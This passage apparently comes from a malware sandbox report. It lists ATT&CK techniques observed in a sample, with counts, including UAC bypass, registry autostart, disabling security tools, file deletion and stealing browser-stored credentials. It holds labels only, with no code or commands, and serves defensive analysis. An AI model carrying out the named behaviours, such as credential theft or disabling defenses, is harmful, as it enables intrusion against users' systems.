- Event Triggered Execution (2): Change Default File Association (1), Image File Execution Options Injection (1)
- Power Settings (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Event Triggered Execution (2): Change Default File Association (1), Image File Execution Options Injection (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Impair Defenses (1): Disable or Modify Tools (1)
- Indicator Removal (2): File Deletion (2)
- Modify Registry (4)
Credential Access
- Credentials from Password Stores (1): Credentials from Web Browsers (1)
- Unsecured Credentials (1): Credentials In Files (1)
Downloads